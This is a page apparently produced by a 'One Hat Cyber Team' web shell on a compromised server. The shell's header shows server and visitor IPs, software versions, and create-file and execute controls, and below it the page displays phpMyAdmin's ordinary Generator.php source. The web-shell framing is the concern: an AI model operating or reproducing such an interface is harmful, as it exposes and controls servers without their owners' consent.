⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.103
Server IP:
45.79.8.107
Server:
Linux localhost 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Server Software:
nginx/1.18.0
PHP Version:
8.1.2-1ubuntu2.22
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
phpmyadmin
/
libraries
/
classes
/
Html
/
View File Name :
Generator.php
<?php /** * HTML Generator */ declare(strict_types=1); namespace PhpMyAdmin\Html; use PhpMyAdmin\Core; use PhpMyAdmin\Message; use PhpMyAdmin\Profiling; use PhpMyAdmin\Providers\ServerVariables\ServerVariablesProvider; use PhpMyAdmin\Response; use PhpMyAdmin\Sanitize; use PhpMyAdmin\SqlParser\Lexer; use PhpMyAdmin\SqlParser\Parser; use PhpMyAdmin\SqlParser\Utils\Error as ParserError; use PhpMyAdmin\Template; use PhpMyAdmin\Url; use PhpMyAdmin\Util; use Throwable; use Twig\Error\LoaderError; use Twig\Error\RuntimeError; use Twig\Error\SyntaxError; use const ENT_COMPAT; use function addslashes; use function array_key_exists; use function ceil; use function count; use function explode; use function floor; use function htmlentities; use function htmlspecialchars; use function implode; use function in_array; use function ini_get; use function intval; use function is_array; use function mb_strlen; use function mb_strstr; use function mb_strtolower; use function mb_substr; use function nl2br; use function preg_match; use function preg_replace; use function sprintf; use function str_replace; use function strlen; use function strncmp; use function strpos; use function trim; use function urlencode; /** * HTML Generator */ class Generator { /** * Displays a button to copy content to clipboard * * @param string $text Text to copy to clipboard * * @return string the html link * * @access public */ public static function showCopyToClipboard(string $text): string { return ' <a href="#" class="copyQueryBtn" data-text="' . htmlspecialchars($text) . '">' . __('Copy') . '</a>'; } /** * Get a link to variable documentation * * @param string $name The variable name * @param bool $useMariaDB Use only MariaDB documentation * @param string $text (optional) The text for the link * * @return string link or empty string */ public static function linkToVarDocumentation( string $name, bool $useMariaDB = false, ?string $text = null ): string { $kbs = ServerVariablesProvider::getImplementation(); $link = $useMariaDB ? $kbs->getDocLinkByNameMariaDb($name) : $kbs->getDocLinkByNameMysql($name); return MySQLDocumentation::show( $name, false, $link, $text ); } /** * Returns HTML code for a tooltip * * @param string $message the message for the tooltip * * @access public */ public static function showHint($message): string { if ($GLOBALS['cfg']['ShowHint']) { $classClause = ' class="pma_hint"'; } else { $classClause = ''; } return '<span' . $classClause . '>' . self::getImage('b_help') . '<span class="hide">' . $message . '</span>' . '</span>'; } /** * returns html code for db link to default db page * * @param string $database database * * @return string html link to default db page */ public static function getDbLink($database = ''): string { if ((string) $database === '') { if ((string) $GLOBALS['db'] === '') { return ''; } $database = $GLOBALS['db']; } else { $database = Util::unescapeMysqlWildcards($database); } $scriptName = Util::getScriptNameForOption( $GLOBALS['cfg']['DefaultTabDatabase'], 'database' ); return '<a href="' . $scriptName . Url::getCommon(['db' => $database], strpos($scriptName, '?') === false ? '?' : '&') . '" title="' . htmlspecialchars( sprintf( __('Jump to database ā%sā.'), $database ) ) . '">' . htmlspecialchars($database) . '</a>'; } /** * Prepare a lightbulb hint explaining a known external bug * that affects a functionality * * @param string $functionality localized message explaining the func. * @param string $component 'mysql' (eventually, 'php') * @param string $minimum_version of this component * @param string $bugref bug reference for this component */ public static function getExternalBug( $functionality, $component, $minimum_version, $bugref ): string { global $dbi; $ext_but_html = ''; if (($component === 'mysql') && ($dbi->getVersion() < $minimum_version)) { $ext_but_html .= self::showHint( sprintf( __('The %s functionality is affected by a known bug, see %s'), $functionality, Core::linkURL('https://bugs.mysql.com/') . $bugref ) ); } return $ext_but_html; } /** * Returns an HTML IMG tag for a particular icon from a theme, * which may be an actual file or an icon from a sprite. * This function takes into account the ActionLinksMode * configuration setting and wraps the image tag in a span tag. * * @param string $icon name of icon file * @param string $alternate alternate text * @param bool $force_text whether to force alternate text to be displayed * @param bool $menu_icon whether this icon is for the menu bar or not * @param string $control_param which directive controls the display * * @return string an html snippet */ public static function getIcon( $icon, $alternate = '', $force_text = false, $menu_icon = false, $control_param = 'ActionLinksMode' ): string { $include_icon = $include_text = false; if (Util::showIcons($control_param)) { $include_icon = true; } if ($force_text || Util::showText($control_param) ) { $include_text = true; } // Sometimes use a span (we rely on this in js/sql.js). But for menu bar // we don't need a span $button = $menu_icon ? '' : '<span class="nowrap">'; if ($include_icon) { $button .= self::getImage($icon, $alternate); } if ($include_icon && $include_text) { $button .= ' '; } if ($include_text) { $button .= $alternate; } $button .= $menu_icon ? '' : '</span>'; return $button; } /** * Returns information about SSL status for current connection */ public static function getServerSSL(): string { $server = $GLOBALS['cfg']['Server']; $class = 'caution'; if (! $server['ssl']) { $message = __('SSL is not being used'); if (! empty($server['socket']) || in_array($server['host'], $GLOBALS['cfg']['MysqlSslWarningSafeHosts'])) { $class = ''; } } elseif (! $server['ssl_verify']) { $message = __('SSL is used with disabled verification'); } elseif (empty($server['ssl_ca'])) { $message = __('SSL is used without certification authority'); } else { $class = ''; $message = __('SSL is used'); } return '<span class="' . $class . '">' . $message . '</span> ' . MySQLDocumentation::showDocumentation( 'setup', 'ssl' ); } /** * Returns default function for a particular column. * * @param array $field Data about the column for which * to generate the dropdown * @param bool $insert_mode Whether the operation is 'insert' * * @return string An HTML snippet of a dropdown list with function * names appropriate for the requested column. * * @global mixed $data data of currently edited row * (used to detect whether to choose defaults) * @global array $cfg PMA configuration */ public static function getDefaultFunctionForField(array $field, $insert_mode): string { global $cfg, $data, $dbi; $default_function = ''; // Can we get field class based values? $current_class = $dbi->types->getTypeClass($field['True_Type']); if (! empty($current_class) && isset($cfg['DefaultFunctions']['FUNC_' . $current_class])) { $default_function = $cfg['DefaultFunctions']['FUNC_' . $current_class]; } // what function defined as default? // for the first timestamp we don't set the default function // if there is a default value for the timestamp // (not including CURRENT_TIMESTAMP) // and the column does not have the // ON UPDATE DEFAULT TIMESTAMP attribute. if (($field['True_Type'] === 'timestamp') && $field['first_timestamp'] && empty($field['Default']) && empty($data) && $field['Extra'] !== 'on update CURRENT_TIMESTAMP' && $field['Null'] === 'NO' ) { $default_function = $cfg['DefaultFunctions']['first_timestamp']; } // For primary keys of type char(36) or varchar(36) UUID if the default // function // Only applies to insert mode, as it would silently trash data on updates. if ($insert_mode && $field['Key'] === 'PRI' && ($field['Type'] === 'char(36)' || $field['Type'] === 'varchar(36)') ) { $default_function = $cfg['DefaultFunctions']['FUNC_UUID']; } return $default_function; } /** * Creates a dropdown box with MySQL functions for a particular column. * * @param array $field Data about the column for which * to generate the dropdown * @param bool $insert_mode Whether the operation is 'insert' * @param array $foreignData Foreign data * * @return string An HTML snippet of a dropdown list with function * names appropriate for the requested column. */ public static function getFunctionsForField(array $field, $insert_mode, array $foreignData): string { global $dbi; $default_function = self::getDefaultFunctionForField($field, $insert_mode); $dropdown_built = []; // Create the output $retval = '<option></option>' . "\n"; // loop on the dropdown array and print all available options for that // field. $functions = $dbi->types->getAllFunctions(); foreach ($functions as $function) { $retval .= '<option'; if (isset($foreignData['foreign_link']) && $foreignData['foreign_link'] !== false && $default_function === $function ) { $retval .= ' selected="selected"'; } $retval .= '>' . $function . '</option>' . "\n"; $dropdown_built[$function] = true; } $retval .= '<option value="PHP_PASSWORD_HASH" title="'; $retval .= htmlentities(__('The PHP function password_hash() with default options.'), ENT_COMPAT); $retval .= '">' . __('password_hash() PHP function') . '</option>' . "\n"; return $retval; } /** * Renders a single link for the top of the navigation panel * * @param string $link The url for the link * @param bool $showText Whether to show the text or to * only use it for title attributes * @param string $text The text to display and use for title attributes * @param bool $showIcon Whether to show the icon * @param string $icon The filename of the icon to show * @param string $linkId Value to use for the ID attribute * @param bool $disableAjax Whether to disable ajax page loading for this link * @param string $linkTarget The name of the target frame for the link * @param array $classes HTML classes to apply * * @return string HTML code for one link */ public static function getNavigationLink( $link, $showText, $text, $showIcon, $icon, $linkId = '', $disableAjax = false, $linkTarget = '', array $classes = [] ): string { $retval = '<a href="' . $link . '"'; if (! empty($linkId)) { $retval .= ' id="' . $linkId . '"'; } if (! empty($linkTarget)) { $retval .= ' target="' . $linkTarget . '"'; } if ($disableAjax) { $classes[] = 'disableAjax'; } if (! empty($classes)) { $retval .= ' class="' . implode(' ', $classes) . '"'; } $retval .= ' title="' . $text . '">'; if ($showIcon) { $retval .= self::getImage( $icon, $text ); } if ($showText) { $retval .= $text; } $retval .= '</a>'; if ($showText) { $retval .= '<br>'; } return $retval; } /** * Function to get html for the start row and number of rows panel * * @param string $sql_query sql query * * @return string html * * @throws Throwable * @throws LoaderError * @throws RuntimeError * @throws SyntaxError */ public static function getStartAndNumberOfRowsPanel($sql_query): string { $template = new Template(); if (isset($_REQUEST['session_max_rows'])) { $rows = $_REQUEST['session_max_rows']; } elseif (isset($_SESSION['tmpval']['max_rows']) && $_SESSION['tmpval']['max_rows'] !== 'all' ) { $rows = $_SESSION['tmpval']['max_rows']; } else { $rows = (int) $GLOBALS['cfg']['MaxRows']; $_SESSION['tmpval']['max_rows'] = $rows; } if (isset($_REQUEST['pos'])) { $pos = $_REQUEST['pos']; } elseif (isset($_SESSION['tmpval']['pos'])) { $pos = $_SESSION['tmpval']['pos']; } else { $number_of_line = (int) $_REQUEST['unlim_num_rows']; $pos = (ceil($number_of_line / $rows) - 1) * $rows; $_SESSION['tmpval']['pos'] = $pos; } return $template->render( 'start_and_number_of_rows_panel', [ 'pos' => $pos, 'unlim_num_rows' => (int) $_REQUEST['unlim_num_rows'], 'rows' => $rows, 'sql_query' => $sql_query, ] ); } /** * Execute an EXPLAIN query and formats results similar to MySQL command line * utility. * * @param string $sqlQuery EXPLAIN query * * @return string query results */ private static function generateRowQueryOutput($sqlQuery): string { global $dbi; $ret = ''; $result = $dbi->query($sqlQuery); if ($result) { $devider = '+'; $columnNames = '|'; $fieldsMeta = $dbi->getFieldsMeta($result); foreach ($fieldsMeta as $meta) { $devider .= '---+'; $columnNames .= ' ' . $meta->name . ' |'; } $devider .= "\n"; $ret .= $devider . $columnNames . "\n" . $devider; while ($row = $dbi->fetchRow($result)) { $values = '|'; foreach ($row as $value) { if ($value === null) { $value = 'NULL'; } $values .= ' ' . $value . ' |'; } $ret .= $values . "\n"; } $ret .= $devider; } return $ret; } /** * Prepare the message and the query * usually the message is the result of the query executed * * @param Message|string $message the message to display * @param string $sql_query the query to display * @param string $type the type (level) of the message * * @throws Throwable * @throws LoaderError * @throws RuntimeError * @throws SyntaxError * * @access public */ public static function getMessage( $message, $sql_query = null, $type = 'notice' ): string { global $cfg, $dbi; $retval = ''; if ($sql_query === null) { if (! empty($GLOBALS['display_query'])) { $sql_query = $GLOBALS['display_query']; } elseif (! empty($GLOBALS['unparsed_sql'])) { $sql_query = $GLOBALS['unparsed_sql']; } elseif (! empty($GLOBALS['sql_query'])) { $sql_query = $GLOBALS['sql_query']; } else { $sql_query = ''; } } $render_sql = $cfg['ShowSQL'] == true && ! empty($sql_query) && $sql_query !== ';'; if (isset($GLOBALS['using_bookmark_message'])) { $retval .= $GLOBALS['using_bookmark_message']->getDisplay(); unset($GLOBALS['using_bookmark_message']); } if ($render_sql) { $retval .= '<div class="result_query">' . "\n"; } if ($message instanceof Message) { if (isset($GLOBALS['special_message'])) { $message->addText($GLOBALS['special_message']); unset($GLOBALS['special_message']); } $retval .= $message->getDisplay(); } else { $context = 'primary'; if ($type === 'error') { $context = 'danger'; } elseif ($type === 'success') { $context = 'success'; } $retval .= '<div class="alert alert-' . $context . '" role="alert">'; $retval .= Sanitize::sanitizeMessage($message); if (isset($GLOBALS['special_message'])) { $retval .= Sanitize::sanitizeMessage($GLOBALS['special_message']); unset($GLOBALS['special_message']); } $retval .= '</div>'; } if ($render_sql) { $query_too_big = false; $queryLength = mb_strlen($sql_query); if ($queryLength > $cfg['MaxCharactersInDisplayedSQL']) { // when the query is large (for example an INSERT of binary // data), the parser chokes; so avoid parsing the query $query_too_big = true; $query_base = mb_substr( $sql_query, 0, $cfg['MaxCharactersInDisplayedSQL'] ) . '[...]'; } else { $query_base = $sql_query; } // Html format the query to be displayed // If we want to show some sql code it is easiest to create it here /* SQL-Parser-Analyzer */ if (! empty($GLOBALS['show_as_php'])) { $new_line = '\\n"<br>' . "\n" . ' . "'; $query_base = htmlspecialchars(addslashes($query_base)); $query_base = preg_replace( '/((\015\012)|(\015)|(\012))/', $new_line, $query_base ); $query_base = '<code class="php"><pre>' . "\n" . '$sql = "' . $query_base . '";' . "\n" . '</pre></code>'; } elseif ($query_too_big) { $query_base = '<code class="sql"><pre>' . "\n" . htmlspecialchars($query_base, ENT_COMPAT) . '</pre></code>'; } else { $query_base = self::formatSql($query_base); } // Prepares links that may be displayed to edit/explain the query // (don't go to default pages, we must go to the page // where the query box is available) // Basic url query part $url_params = []; if (! isset($GLOBALS['db'])) { $GLOBALS['db'] = ''; } if (strlen($GLOBALS['db']) > 0) { $url_params['db'] = $GLOBALS['db']; if (strlen($GLOBALS['table']) > 0) { $url_params['table'] = $GLOBALS['table']; $edit_link = Url::getFromRoute('/table/sql'); } else { $edit_link = Url::getFromRoute('/database/sql'); } } else { $edit_link = Url::getFromRoute('/server/sql'); } // Want to have the query explained // but only explain a SELECT (that has not been explained) /* SQL-Parser-Analyzer */ $explain_link = ''; $is_select = preg_match('@^SELECT[[:space:]]+@i', $sql_query); if (! empty($cfg['SQLQuery']['Explain']) && ! $query_too_big) { $explain_params = $url_params; if ($is_select) { $explain_params['sql_query'] = 'EXPLAIN ' . $sql_query; $explain_link = ' [ ' . self::linkOrButton( Url::getFromRoute('/import', $explain_params), __('Explain SQL') ) . ' ]'; } elseif (preg_match( '@^EXPLAIN[[:space:]]+SELECT[[:space:]]+@i', $sql_query )) { $explain_params['sql_query'] = mb_substr($sql_query, 8); $explain_link = ' [ ' . self::linkOrButton( Url::getFromRoute('/import', $explain_params), __('Skip Explain SQL') ) . ']'; $url = 'https://mariadb.org/explain_analyzer/analyze/' . '?client=phpMyAdmin&raw_explain=' . urlencode(self::generateRowQueryOutput($sql_query)); $explain_link .= ' [' . self::linkOrButton( htmlspecialchars('url.php?url=' . urlencode($url)), sprintf(__('Analyze Explain at %s'), 'mariadb.org'), [], '_blank' ) . ' ]'; } } $url_params['sql_query'] = $sql_query; $url_params['show_query'] = 1; // even if the query is big and was truncated, offer the chance // to edit it (unless it's enormous, see linkOrButton() ) if (! empty($cfg['SQLQuery']['Edit']) && empty($GLOBALS['show_as_php']) ) { $edit_link .= Url::getCommon($url_params, '&'); $edit_link = ' [ ' . self::linkOrButton($edit_link, __('Edit')) . ' ]'; } else { $edit_link = ''; } // Also we would like to get the SQL formed in some nice // php-code if (! empty($cfg['SQLQuery']['ShowAsPHP']) && ! $query_too_big) { if (! empty($GLOBALS['show_as_php'])) { $php_link = ' [ ' . self::linkOrButton( Url::getFromRoute('/import', $url_params), __('Without PHP code') ) . ' ]'; $php_link .= ' [ ' . self::linkOrButton( Url::getFromRoute('/import', $url_params), __('Submit query') ) . ' ]'; } else { $php_params = $url_params; $php_params['show_as_php'] = 1; $php_link = ' [ ' . self::linkOrButton( Url::getFromRoute('/import', $php_params), __('Create PHP code') ) . ' ]'; } } else { $php_link = ''; } // Refresh query if (! empty($cfg['SQLQuery']['Refresh']) && ! isset($GLOBALS['show_as_php']) // 'Submit query' does the same && preg_match('@^(SELECT|SHOW)[[:space:]]+@i', $sql_query) ) { $refresh_link = Url::getFromRoute('/sql', $url_params); $refresh_link = ' [ ' . self::linkOrButton($refresh_link, __('Refresh')) . ' ]'; } else { $refresh_link = ''; } $retval .= '<div class="sqlOuter">'; $retval .= $query_base; $retval .= '</div>'; $retval .= '<div class="tools print_ignore">'; $retval .= '<form action="' . Url::getFromRoute('/sql') . '" method="post">'; $retval .= Url::getHiddenInputs($GLOBALS['db'], $GLOBALS['table']); $retval .= '<input type="hidden" name="sql_query" value="' . htmlspecialchars($sql_query) . '">'; // avoid displaying a Profiling checkbox that could // be checked, which would re-execute an INSERT, for example if (! empty($refresh_link) && Profiling::isSupported($dbi)) { $retval .= '<input type="hidden" name="profiling_form" value="1">'; $retval .= '<input type="checkbox" name="profiling" id="profilingCheckbox" class="autosubmit"'; $retval .= isset($_SESSION['profiling']) ? ' checked' : ''; $retval .= '> <label for="profilingCheckbox">' . __('Profiling') . '</label>'; } $retval .= '</form>'; /** * TODO: Should we have $cfg['SQLQuery']['InlineEdit']? */ if (! empty($cfg['SQLQuery']['Edit']) && ! $query_too_big && empty($GLOBALS['show_as_php']) ) { $inline_edit_link = ' [ ' . self::linkOrButton( '#', _pgettext('Inline edit query', 'Edit inline'), ['class' => 'inline_edit_sql'] ) . ' ]'; } else { $inline_edit_link = ''; } $retval .= $inline_edit_link . $edit_link . $explain_link . $php_link . $refresh_link; $retval .= '</div>'; $retval .= '</div>'; } return $retval; } /** * Displays a link to the PHP documentation * * @param string $target anchor in documentation * * @return string the html link * * @access public */ public static function showPHPDocumentation($target): string { return self::showDocumentationLink(Core::getPHPDocLink($target)); } /** * Displays a link to the documentation as an icon * * @param string $link documentation link * @param string $target optional link target * @param bool $bbcode optional flag indicating whether to output bbcode * * @return string the html link * * @access public */ public static function showDocumentationLink($link, $target = 'documentation', $bbcode = false): string { if ($bbcode) { return '[a@' . $link . '@' . $target . '][dochelpicon][/a]'; } return '<a href="' . $link . '" target="' . $target . '">' . self::getImage('b_help', __('Documentation')) . '</a>'; } /** * Displays a MySQL error message in the main panel when $exit is true. * Returns the error message otherwise. * * @param string|bool $server_msg Server's error message. * @param string $sql_query The SQL query that failed. * @param bool $is_modify_link Whether to show a "modify" link or not. * @param string $back_url URL for the "back" link (full path is * not required). * @param bool $exit Whether execution should be stopped or * the error message should be returned. * * @global string $table The current table. * @global string $db The current database. * * @access public */ public static function mysqlDie( $server_msg = '', $sql_query = '', $is_modify_link = true, $back_url = '', $exit = true ): ?string { global $table, $db, $dbi; /** * Error message to be built. * * @var string $error_msg */ $error_msg = ''; // Checking for any server errors. if (empty($server_msg)) { $server_msg = (string) $dbi->getError(); } // Finding the query that failed, if not specified. if (empty($sql_query) && ! empty($GLOBALS['sql_query'])) { $sql_query = $GLOBALS['sql_query']; } $sql_query = trim($sql_query); /** * The lexer used for analysis. * * @var Lexer $lexer */ $lexer = new Lexer($sql_query); /** * The parser used for analysis. * * @var Parser $parser */ $parser = new Parser($lexer->list); /** * The errors found by the lexer and the parser. * * @var array $errors */ $errors = ParserError::get( [ $lexer, $parser, ] ); if (empty($sql_query)) { $formatted_sql = ''; } elseif (count($errors)) { $formatted_sql = htmlspecialchars($sql_query); } else { $formatted_sql = self::formatSql($sql_query, true); } $error_msg .= '<div class="alert alert-danger" role="alert"><h1>' . __('Error') . '</h1>'; // For security reasons, if the MySQL refuses the connection, the query // is hidden so no details are revealed. if (! empty($sql_query) && ! mb_strstr($sql_query, 'connect')) { // Static analysis errors. if (! empty($errors)) { $error_msg .= '<p><strong>' . __('Static analysis:') . '</strong></p>'; $error_msg .= '<p>' . sprintf( __('%d errors were found during analysis.'), count($errors) ) . '</p>'; $error_msg .= '<p><ol>'; $error_msg .= implode( ParserError::format( $errors, '<li>%2$s (near "%4$s" at position %5$d)</li>' ) ); $error_msg .= '</ol></p>'; } // Display the SQL query and link to MySQL documentation. $error_msg .= '<p><strong>' . __('SQL query:') . '</strong>' . self::showCopyToClipboard( $sql_query ) . "\n"; $formattedSqlToLower = mb_strtolower($formatted_sql); // TODO: Show documentation for all statement types. if (mb_strstr($formattedSqlToLower, 'select')) { // please show me help to the error on select $error_msg .= MySQLDocumentation::show('SELECT'); } if ($is_modify_link) { $_url_params = [ 'sql_query' => $sql_query, 'show_query' => 1, ]; if (strlen($table) > 0) { $_url_params['db'] = $db; $_url_params['table'] = $table; $doedit_goto = '<a href="' . Url::getFromRoute('/table/sql', $_url_params) . '">'; } elseif (strlen($db) > 0) { $_url_params['db'] = $db; $doedit_goto = '<a href="' . Url::getFromRoute('/database/sql', $_url_params) . '">'; } else { $doedit_goto = '<a href="' . Url::getFromRoute('/server/sql', $_url_params) . '">'; } $error_msg .= $doedit_goto . self::getIcon('b_edit', __('Edit')) . '</a>'; } $error_msg .= ' </p>' . "\n" . '<p>' . "\n" . $formatted_sql . "\n" . '</p>' . "\n"; } // Display server's error. if (! empty($server_msg)) { $server_msg = (string) preg_replace( "@((\015\012)|(\015)|(\012)){3,}@", "\n\n", (string) $server_msg ); // Adds a link to MySQL documentation. $error_msg .= '<p>' . "\n" . ' <strong>' . __('MySQL said: ') . '</strong>' . MySQLDocumentation::show('server-error-reference') . "\n" . '</p>' . "\n"; // The error message will be displayed within a CODE segment. // To preserve original formatting, but allow word-wrapping, // a couple of replacements are done. // All non-single blanks and TAB-characters are replaced with their // HTML-counterpart $server_msg = str_replace( [ ' ', "\t", ], [ ' ', ' ', ], $server_msg ); // Replace line breaks $server_msg = nl2br($server_msg); $error_msg .= '<code>' . $server_msg . '</code><br>'; } $error_msg .= '</div>'; $_SESSION['Import_message']['message'] = $error_msg; if (! $exit) { return $error_msg; } /** * If this is an AJAX request, there is no "Back" link and * `Response()` is used to send the response. */ $response = Response::getInstance(); if ($response->isAjax()) { $response->setRequestStatus(false); $response->addJSON('message', $error_msg); exit; } if (! empty($back_url)) { if (mb_strstr($back_url, '?')) { $back_url .= '&no_history=true'; } else { $back_url .= '?no_history=true'; } $_SESSION['Import_message']['go_back_url'] = $back_url; $error_msg .= '<fieldset class="tblFooters">' . '[ <a href="' . $back_url . '">' . __('Back') . '</a> ]' . '</fieldset>' . "\n\n"; } exit($error_msg); } /** * Returns an HTML IMG tag for a particular image from a theme * * The image name should match CSS class defined in icons.css.php * * @param string $image The name of the file to get * @param string $alternate Used to set 'alt' and 'title' attributes * of the image * @param array $attributes An associative array of other attributes * * @return string an html IMG tag */ public static function getImage($image, $alternate = '', array $attributes = []): string { $alternate = htmlspecialchars($alternate); if (isset($attributes['class'])) { $attributes['class'] = 'icon ic_' . $image . ' ' . $attributes['class']; } else { $attributes['class'] = 'icon ic_' . $image; } // set all other attributes $attr_str = ''; foreach ($attributes as $key => $value) { if (in_array($key, ['alt', 'title'])) { continue; } $attr_str .= ' ' . $key . '="' . $value . '"'; } // override the alt attribute $alt = $attributes['alt'] ?? $alternate; // override the title attribute $title = $attributes['title'] ?? $alternate; // generate the IMG tag $template = '<img src="themes/dot.gif" title="%s" alt="%s"%s>'; return sprintf($template, $title, $alt, $attr_str); } /** * Displays a link, or a link with code to trigger POST request. * * POST is used in following cases: * * - URL is too long * - URL components are over Suhosin limits * - There is SQL query in the parameters * * @param string $url the URL * @param string $message the link message * @param mixed $tag_params string: js confirmation; array: additional tag * params (f.e. style="") * @param string $target target * * @return string the results to be echoed or saved in an array */ public static function linkOrButton( $url, $message, $tag_params = [], $target = '' ): string { $url_length = strlen($url); if (! is_array($tag_params)) { $tmp = $tag_params; $tag_params = []; if (! empty($tmp)) { $tag_params['onclick'] = 'return Functions.confirmLink(this, \'' . Sanitize::escapeJsString($tmp) . '\')'; } unset($tmp); } if (! empty($target)) { $tag_params['target'] = $target; if ($target === '_blank' && strncmp($url, 'url.php?', 8) == 0) { $tag_params['rel'] = 'noopener noreferrer'; } } // Suhosin: Check that each query parameter is not above maximum $in_suhosin_limits = true; if ($url_length <= $GLOBALS['cfg']['LinkLengthLimit']) { $suhosin_get_MaxValueLength = ini_get('suhosin.get.max_value_length'); if ($suhosin_get_MaxValueLength) { $query_parts = Util::splitURLQuery($url); foreach ($query_parts as $query_pair) { if (strpos($query_pair, '=') === false) { continue; } [, $eachval] = explode('=', $query_pair); if (strlen($eachval) > $suhosin_get_MaxValueLength) { $in_suhosin_limits = false; break; } } } } $tag_params_strings = []; if (($url_length > $GLOBALS['cfg']['LinkLengthLimit']) || ! $in_suhosin_limits // Has as sql_query without a signature || (strpos($url, 'sql_query=') !== false && strpos($url, 'sql_signature=') === false) || strpos($url, 'view[as]=') !== false ) { $parts = explode('?', $url, 2); /* * The data-post indicates that client should do POST * this is handled in js/ajax.js */ $tag_params_strings[] = 'data-post="' . ($parts[1] ?? '') . '"'; $url = $parts[0]; if (array_key_exists('class', $tag_params) && strpos($tag_params['class'], 'create_view') !== false ) { $url .= '?' . explode('&', $parts[1], 2)[0]; } } foreach ($tag_params as $par_name => $par_value) { $tag_params_strings[] = $par_name . '="' . htmlspecialchars($par_value) . '"'; } // no whitespace within an <a> else Safari will make it part of the link return '<a href="' . $url . '" ' . implode(' ', $tag_params_strings) . '>' . $message . '</a>'; } /** * Prepare navigation for a list * * @param int $count number of elements in the list * @param int $pos current position in the list * @param array $_url_params url parameters * @param string $script script name for form target * @param string $frame target frame * @param int $max_count maximum number of elements to display from * the list * @param string $name the name for the request parameter * @param string[] $classes additional classes for the container * * @return string the html content * * @access public * * @todo use $pos from $_url_params */ public static function getListNavigator( $count, $pos, array $_url_params, $script, $frame, $max_count, $name = 'pos', $classes = [] ): string { // This is often coming from $cfg['MaxTableList'] and // people sometimes set it to empty string $max_count = intval($max_count); if ($max_count <= 0) { $max_count = 250; } $class = $frame === 'frame_navigation' ? ' class="ajax"' : ''; $list_navigator_html = ''; if ($max_count < $count) { $classes[] = 'pageselector'; $list_navigator_html .= '<div class="' . implode(' ', $classes) . '">'; if ($frame !== 'frame_navigation') { $list_navigator_html .= __('Page number:'); } // Move to the beginning or to the previous page if ($pos > 0) { $caption1 = ''; $caption2 = ''; if (Util::showIcons('TableNavigationLinksMode')) { $caption1 .= '<< '; $caption2 .= '< '; } if (Util::showText('TableNavigationLinksMode')) { $caption1 .= _pgettext('First page', 'Begin'); $caption2 .= _pgettext('Previous page', 'Previous'); } $title1 = ' title="' . _pgettext('First page', 'Begin') . '"'; $title2 = ' title="' . _pgettext('Previous page', 'Previous') . '"'; $_url_params[$name] = 0; $list_navigator_html .= '<a' . $class . $title1 . ' href="' . $script . Url::getCommon($_url_params, '&') . '">' . $caption1 . '</a>'; $_url_params[$name] = $pos - $max_count; $list_navigator_html .= ' <a' . $class . $title2 . ' href="' . $script . Url::getCommon($_url_params, '&') . '">' . $caption2 . '</a>'; } $list_navigator_html .= '<form action="' . $script . '" method="post">'; $list_navigator_html .= Url::getHiddenInputs($_url_params); $list_navigator_html .= Util::pageselector( $name, $max_count, Util::getPageFromPosition($pos, $max_count), (int) ceil($count / $max_count) ); $list_navigator_html .= '</form>'; if ($pos + $max_count < $count) { $caption3 = ''; $caption4 = ''; if (Util::showText('TableNavigationLinksMode')) { $caption3 .= _pgettext('Next page', 'Next'); $caption4 .= _pgettext('Last page', 'End'); } if (Util::showIcons('TableNavigationLinksMode')) { $caption3 .= ' >'; $caption4 .= ' >>'; } $title3 = ' title="' . _pgettext('Next page', 'Next') . '"'; $title4 = ' title="' . _pgettext('Last page', 'End') . '"'; $_url_params[$name] = $pos + $max_count; $list_navigator_html .= '<a' . $class . $title3 . ' href="' . $script . Url::getCommon($_url_params, '&') . '" >' . $caption3 . '</a>'; $_url_params[$name] = floor($count / $max_count) * $max_count; if ($_url_params[$name] == $count) { $_url_params[$name] = $count - $max_count; } $list_navigator_html .= ' <a' . $class . $title4 . ' href="' . $script . Url::getCommon($_url_params, '&') . '" >' . $caption4 . '</a>'; } $list_navigator_html .= '</div>' . "\n"; } return $list_navigator_html; } /** * format sql strings * * @param string $sqlQuery raw SQL string * @param bool $truncate truncate the query if it is too long * * @return string the formatted sql * * @global array $cfg the configuration array * * @access public */ public static function formatSql($sqlQuery, $truncate = false): string { global $cfg; if ($truncate && mb_strlen($sqlQuery) > $cfg['MaxCharactersInDisplayedSQL'] ) { $sqlQuery = mb_substr( $sqlQuery, 0, $cfg['MaxCharactersInDisplayedSQL'] ) . '[...]'; } return '<code class="sql"><pre>' . "\n" . htmlspecialchars($sqlQuery, ENT_COMPAT) . "\n" . '</pre></code>'; } /** * This function processes the datatypes supported by the DB, * as specified in Types->getColumns() and returns an HTML snippet that * creates a drop-down list. * * @param string $selected The value to mark as selected in HTML mode */ public static function getSupportedDatatypes($selected): string { global $dbi; // NOTE: the SELECT tag is not included in this snippet. $retval = ''; foreach ($dbi->types->getColumns() as $key => $value) { if (is_array($value)) { $retval .= '<optgroup label="' . htmlspecialchars($key) . '">'; foreach ($value as $subvalue) { if ($subvalue == $selected) { $retval .= sprintf( '<option selected="selected" title="%s">%s</option>', $dbi->types->getTypeDescription($subvalue), $subvalue ); } elseif ($subvalue === '-') { $retval .= '<option disabled="disabled">'; $retval .= $subvalue; $retval .= '</option>'; } else { $retval .= sprintf( '<option title="%s">%s</option>', $dbi->types->getTypeDescription($subvalue), $subvalue ); } } $retval .= '</optgroup>'; } elseif ($selected == $value) { $retval .= sprintf( '<option selected="selected" title="%s">%s</option>', $dbi->types->getTypeDescription($value), $value ); } else { $retval .= sprintf( '<option title="%s">%s</option>', $dbi->types->getTypeDescription($value), $value ); } } return $retval; } }